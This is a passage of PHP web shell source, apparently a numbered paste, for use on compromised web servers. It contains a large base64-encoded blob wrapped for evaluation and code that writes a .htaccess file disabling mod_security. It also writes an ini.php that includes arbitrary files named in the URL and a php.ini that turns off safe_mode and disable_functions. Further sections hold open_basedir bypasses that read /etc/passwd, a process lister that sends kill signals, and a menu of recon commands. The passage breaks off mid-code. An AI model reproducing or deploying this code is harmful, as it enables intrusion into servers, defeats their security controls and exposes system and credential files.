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'))); ?></textarea>
  1029. </td>
  1030. </tr>
  1031. <tr>
  1032. <td>
  1033. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  1034. </td></tr></table>
  1035. </form>
  1036.  
  1037. <?php }
  1038. # x=dmsec1
  1039. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec1')) {
  1040. @error_reporting(0);
  1041. $htaccess=fopen('.htaccess','w');
  1042. $iniphp=fopen('ini.php','w');
  1043.  
  1044. $jablay="<IfModule mod_security.c>
  1045. SecFilterEngine OFF
  1046. SecFilterScanPOST OFF
  1047. </IfModule>";
  1048. $kimcil="<?
  1049. echo ini_get(\"safe_mode\");
  1050. echo ini_get(\"open_basedir\");
  1051. include(\$_GET[\"file\"]);
  1052. ini_restore(\"safe_mode\");
  1053. ini_restore(\"open_basedir\");
  1054. echo ini_get(\"safe_mode\");
  1055. echo ini_get(\"open_basedir\");
  1056. include(\$_GET[\"ss\"]);
  1057. ?>";
  1058. fwrite($htaccess,$jablay);
  1059. fwrite($iniphp,$kimcil);
  1060.  
  1061. $kobel="<center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>HTACCESS ]:=O</span></b></nobr><br/><br/><nobr><span class='b9'>Generate htaccess & ini.php Successfully :)</span></nobr><br/><br/><br/></center>";
  1062. echo $kobel;
  1063. }
  1064.  
  1065. # x=dmsec2
  1066. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec2')){ ?>
  1067. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmsec2" method="post">
  1068.  
  1069. <?php
  1070. @error_reporting(0);
  1071. $ayo=fopen('php.ini','w');
  1072. $blay=" safe_mode = OFF
  1073. disable_functions = NONE";
  1074. fwrite($ayo,$blay);
  1075. $hotel=" <center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>PHP.INI ]:=O</span></b></nobr><br/><br/>
  1076. <nobr><span class='b9'>Generate php.ini Successfully :)</span></nobr><br/><br/><br/></center>";
  1077. echo $hotel;
  1078. }
  1079.  
  1080. # x=dmsec3
  1081. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec3')) {
  1082.  
  1083. @error_reporting(0);
  1084. function CleanDir($d){
  1085. $d=str_replace("\\","/",$d);
  1086. $d=str_replace("//","/",$d);
  1087. return $d;
  1088. }
  1089. if(isset($_POST['curl_bypass'])){
  1090. @error_reporting(0);
  1091. $ch=curl_init("file://$_POST[file_bypass]");
  1092. curl_setopt($ch,CURLOPT_HEADERS,0);
  1093. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1094. $file_out=curl_exec($ch);
  1095. curl_close($ch);
  1096. echo "<br/><br/><center><textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70' >".htmlspecialchars($file_out)."</textarea></br></br>";
  1097. }
  1098.  
  1099. elseif(isset($_POST['tmp_bypass'])) {
  1100. tempnam("/home/",$_POST['file_passwd']);
  1101. }
  1102.  
  1103. elseif(isset($_POST['copy_bypass'])) {
  1104. if(@copy($_POST['file_bypass'],$_POST['dest'])) {
  1105. @$fh=fopen($_POST['dest'],'r');
  1106. echo "<textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70'>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
  1107. @fclose($fh);
  1108. } else echo "<center><br/><br/>
  1109. <h1>O=:[ BYPASS DENIED ]:=O</h1><br></br>";
  1110. }
  1111. echo "<br/><br/><table style='margin: auto; width: 100%; text-align: center;'><tr>
  1112. <td colspan='3'> <center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span><span class='b8'>BASEDIR ]:=O</span></b></nobr><br/><br/></center> </td>
  1113. </tr>
  1114. <tr>
  1115. <td>[~] Bypass Basedir cURL [~]</td>
  1116. <td>[~] Bypass Basedir tempnam() [~]</td>
  1117. <td>[~] Bypass Basedir copy() [~]</td>
  1118. </tr>
  1119. <tr>
  1120. <td><nobr><form method='post' name='bypasser'>
  1121. FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'> <input type='submit' name='curl_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'></form></td>
  1122.  
  1123. <td><nobr><form method='post' name='bypasser'>FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='../../../etc/passwd' name='file_bypass'> <input type='submit' style='color:#FF0000;background-color:#000000' name='tmp_bypass' value='Bypass'>
  1124. </nobr></form>
  1125. </td>
  1126. <td><nobr><form method='post' name='bypasser'>FILE COPY TO : <input type='text'style='color:#FF0000;background-color:#000000' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/maho.txt'> <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'> <input type='submit' name='copy_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'>
  1127. </nobr></form>
  1128. </td>
  1129. </table>";
  1130. }
  1131.  
  1132. # x=dmsec4
  1133. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec4')) {
  1134.  
  1135. function dmprocess() {
  1136. if(!$win) {
  1137. $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");
  1138. }
  1139. else {
  1140. $handler = "tasklist";
  1141. }
  1142. $ret = myshellexec($handler);
  1143. if (!$ret) {
  1144. echo "Can't execute \"".$handler."\"!";
  1145. }
  1146. else {
  1147. if (empty($processes_sort)) {
  1148. $processes_sort = $sort_default;
  1149. }
  1150. $parsesort = parsesort($processes_sort);
  1151. if(!is_numeric($parsesort[0])) {
  1152. $parsesort[0] = 0;
  1153. }
  1154. $k = $parsesort[0];
  1155. $ret = htmlspecialchars($ret);
  1156. if(!$win) {
  1157. if($pid) {
  1158. if (is_null($sig)) {$sig = 9;}
  1159. echo "Sending signal ".$sig." to #".$pid."... ";
  1160. if (posix_kill($pid,$sig)) {
  1161. echo "OK.";
  1162. }
  1163. else {
  1164. echo "ERROR.";
  1165. }
  1166. }
  1167. while (ereg(" ",$ret)) {
  1168. $ret = str_replace(" "," ",$ret);
  1169. }
  1170. $stack = explode("\n",$ret);
  1171. $head = explode(" ",$stack[0]);
  1172. unset($stack[0]);
  1173. $prcs = array();
  1174.  
  1175. foreach ($stack as $line) {
  1176. if(!empty($line)) {
  1177. echo "<tr>";
  1178. $line = explode(" ",$line);
  1179. $line[10] = join(" ",array_slice($line,10));
  1180. $line = array_slice($line,0,11);
  1181. $prcs[] = $line;
  1182. echo "</tr>";
  1183. }
  1184. }
  1185. }
  1186. else {
  1187.  
  1188. while (ereg(" ",$ret)) {
  1189. $ret = str_replace(" ","",$ret);
  1190. }
  1191. while (ereg(" ",$ret)) {
  1192. $ret = str_replace(" ","",$ret);
  1193. }
  1194. while (ereg(" ",$ret)) {
  1195. $ret = str_replace(" ","",$ret);
  1196. }
  1197. while (ereg(" ",$ret)) {
  1198. $ret = str_replace(" ","",$ret);
  1199. }
  1200. while (ereg(" ",$ret)) {
  1201. $ret = str_replace(" ","",$ret);
  1202. }
  1203. while (ereg(" ",$ret)) {
  1204. $ret = str_replace(" ","",$ret);
  1205. }
  1206. while (ereg(" ",$ret)) {
  1207. $ret = str_replace(" ","",$ret);
  1208. }
  1209. while (ereg(" ",$ret)) {
  1210. $ret = str_replace(" ","",$ret);
  1211. }
  1212. while (ereg(" ",$ret)) {
  1213. $ret = str_replace(" ","",$ret);
  1214. }
  1215. while (ereg("",$ret)) {
  1216. $ret = str_replace("","",$ret);
  1217. }
  1218. while (ereg(" ",$ret)) {
  1219. $ret = str_replace(" ","",$ret);
  1220. }
  1221. $ret = convert_cyr_string($ret,"d","w");
  1222. $stack = explode("\n",$ret);
  1223. unset($stack[0],$stack[2]);
  1224. $stack = array_values($stack);
  1225. $head = explode("",$stack[0]);
  1226. $head[1] = explode(" ",$head[1]);
  1227. $head[1] = $head[1][0];
  1228. $stack = array_slice($stack,1);
  1229. unset($head[2]);
  1230. $head = array_values($head);
  1231. if ($k > count($head)) {
  1232. $k = count($head)-1;
  1233. }
  1234. $prcs = array();
  1235. foreach ($stack as $line) {
  1236. if (!empty($line)) {
  1237. echo "<tr>";
  1238. $line = explode("",$line);
  1239. $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  1240. $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  1241. $prcs[] = $line;
  1242. echo "</tr>";
  1243. }
  1244. }
  1245. }
  1246. $head[$k] = "<b>".$head[$k]."</b>".$y;
  1247. $v = $processes_sort[0];
  1248. if($processes_sort[1] == "d") {
  1249. $prcs = array_reverse($prcs);
  1250. }
  1251. $tab = array();
  1252. $tab[] = $head;
  1253. $tab = array_merge($tab,$prcs);
  1254. echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  1255. foreach($tab as $i=>$k) {
  1256. echo "<tr>";
  1257. foreach($k as $j=>$v) {
  1258.  
  1259. if($win and $i > 0 and $j == 2) {
  1260. $v = view_size($v);
  1261. }
  1262. echo "<td>".$v."</td>";
  1263. }
  1264. echo "</tr>";
  1265. }
  1266. echo "</table>";
  1267. }
  1268. }
  1269.  
  1270. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>PROCESS ]:=O</span></b></nobr><br/><br/>";
  1271.  
  1272. if($win) {
  1273. echo "<form method='post'>
  1274. <select class='inputz' name='windowsprocess'>
  1275. <option name='systeminfo'>System Info</option>
  1276. <option name='active'>Active Connections</option>
  1277. <option name='runningserv'>Running Services</option>
  1278. <option name='useracc'>User Accounts</option>
  1279. <option name='showcom'>Show Computers</option>
  1280. <option name='arptab'>ARP Table</option>
  1281. <option name='ipconf'>IP Configuration</option></select>
  1282. <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
  1283. </form>";
  1284. } else {
  1285. echo "<form method='post'>
  1286. <select class='inputz' name='nonwindowsprocess'>
  1287. <option name='passwd'>Passwd</option>
  1288. <option name='syslog'>Syslog</option>
  1289. <option name='resolv'>Resolv</option>
  1290. <option name='hosts'>Hosts</option>
  1291. <option name='cpuinfo'>Cpuinfo</option>
  1292. <option name='version'>Version</option>
  1293. <option name='sbin'>Sbin</option>
  1294. <option name='interrupts'>Interrupts</option>
  1295. <option name='lsattr'>lsattr</option>
  1296. <option name='uptime'>Uptime</option>
  1297. <option name='fstab'>Fstab</option>
  1298. <option name='hddspace'>HDD Space</option>
  1299. </select>
  1300. <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '></form>";
  1301. }
  1302.  
  1303. $windowsprocess = $_POST['windowsprocess'];
  1304. $nonwindowsprocess = $_POST['nonwindowsprocess'];
  1305.  
  1306. if ($windowsprocess=="System Info") $winruncom = "systeminfo";
  1307. if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
  1308. if ($windowsprocess=="Running Services") $winruncom = "net start";
  1309. if ($windowsprocess=="User Accounts") $winruncom = "net user";
  1310. if ($windowsprocess=="Show Computers") $winruncom = "net view";
  1311. if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
  1312. if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
  1313. if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf";
  1314. if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf";
  1315. if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
  1316. if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
  1317. if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
  1318. if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
  1319. if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
  1320. if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
  1321. if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
  1322. if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
  1323. if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
  1324. if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
  1325. if (isset($winruncom)) {
  1326. echo "<table class='cmdbox'><tbody><tr><td colspan='2'><textarea class='output' name='content'>".exe($winruncom)."</textarea></td></tr></table></center>";
  1327. }
  1328. if (isset($systeminfo)) {
  1329. echo "<br><br>";
  1330. dmprocess();
  1331. }
  1332. }
  1333.  
  1334. # x=dmsym1
  1335. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym1')) {
  1336. @session_start();
